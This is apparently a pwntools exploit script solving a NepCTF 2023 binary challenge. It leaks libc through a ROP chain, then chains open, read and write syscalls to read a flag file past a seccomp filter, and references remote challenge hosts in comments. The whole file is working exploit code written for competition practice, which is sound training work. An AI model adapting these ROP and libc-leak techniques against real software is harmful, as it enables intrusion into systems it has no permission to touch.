1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90
| from pwn import * context.arch='amd64' context.log_level='debug' power_rop1=0x0000000000400806 power_rop2=0x00000000004007F0 buf_inp=0x0000000000601039 pop_rbp=0x0000000000400628 bss_addr=0x0000000000601050 def getpower(avg1,avg2,avg3,got): payload=p64(power_rop1)+p64(0)+p64(0)+p64(1)+p64(got)+p64(avg1)+p64(avg2)+p64(avg3) payload+=p64(power_rop2)+p64(0)*7#为什么是7呢,因为虽然只有6个pop但是上面还有个rsp+8 return payload
# p=process('./pwn') p=process('../出题/pwn3/pwn') # p=remote('162.14.104.152','10017') # p=remote('nepctf.1cepeak.cn','31507')
elf=ELF('pwn') libc=ELF('./libc-2.27.so') syscall_got=elf.got['syscall'] seccomp_init_got=elf.symbols['seccomp_init'] # pause() # gdb.attach(p,'b *0x000000000040078D') # pause()
payload=b'flag\x00\x00\x00\x00'*(0x30//8)+p64(0x4007b0) payload+=getpower(0,0,buf_inp,syscall_got) # payload+=getpower(buf_inp,0,0,syscall_got) payload+=getpower(1,1,syscall_got,syscall_got) payload+=p64(pop_rbp)+p64(buf_inp+8) # payload+=getpower(0,0,buf_inp+0x10,syscall_got) # payload+=getpower(1,syscall_got,0x20,syscall_got) # payload+=p64(elf.symbols['__libc_start_main']) payload+=p64(0x000000000040076D) # payload+=getpower(buf_inp,0,2,syscall_got) # payload+=getpower(3,buf_inp+0x6,0x30,syscall_got) # payload+=getpower(1,buf_inp+0x6,0x30,syscall_got) p.sendlineafter(b'!!!\n',payload) # p.sendlineafter(b'NepCTF2023!\n',payload) pause() p.sendline(b'flag\x00\x00\x00\x00'+p64(0x601000)) # pause()
# payload=b'a'*0x30+p64(0x4007b0) # payload+=getpower(1,1,syscall_got,syscall_got) # payload+=p64(0x000000000040076D) # p.sendlineafter(b'NepCTF2023!\n',payload)
# pause() # # p.sendline(b'')# 控制rax为1 # # # 接收libc recvaddr=p.recvuntil(b'\x7f') sysaddr=u64(recvaddr[-6:].ljust(8,b'\x00')) print(hex(sysaddr)) libcbase=sysaddr-libc.symbols['syscall'] print('libcbase',hex(libcbase))
pop_rax=libcbase+0x000000000001b500 open_addr=libcbase+libc.symbols['open'] read_addr=libcbase+libc.symbols['read'] write_addr=libcbase+libc.symbols['write'] pop_rdi=0x0000000000400813 pop_rdx_rsi=libcbase+0x0000000000130539 pop_rsp=libcbase+0x000000000000396c pop_rcx=libcbase+0x00000000000e433e
payload=b'flag\x00\x00\x00\x00'*(0x30//8)+p64(0x4007b0) payload+=p64(pop_rax)+p64(2)+p64(pop_rcx)+p64(0) # payload+=getpower(buf_inp,0,0,syscall_got) payload+=flat([pop_rdi,buf_inp,pop_rdx_rsi,0,0,pop_rbp,buf_inp+0x30,sysaddr+23]) payload+=p64(pop_rax)+p64(0) payload+=flat([pop_rdi,3,pop_rdx_rsi,0x30,buf_inp,sysaddr+23]) payload+=p64(pop_rax)+p64(1) payload+=flat([pop_rdi,1,pop_rdx_rsi,0x30,buf_inp,sysaddr+23]) # payload+=flat([pop_rdi,buf_inp-1,pop_rdx_rsi,0,0,open_addr]) # payload+= payload+=p64(0x000000000040076D) print('len',len(payload)) # p.sendlineafter(b'NepCTF2023!\n',payload) p.sendlineafter(b'!!!\n',payload)
# # pop_rax=libcbase+0x000000000001b500 # # payload2=
p.interactive()
|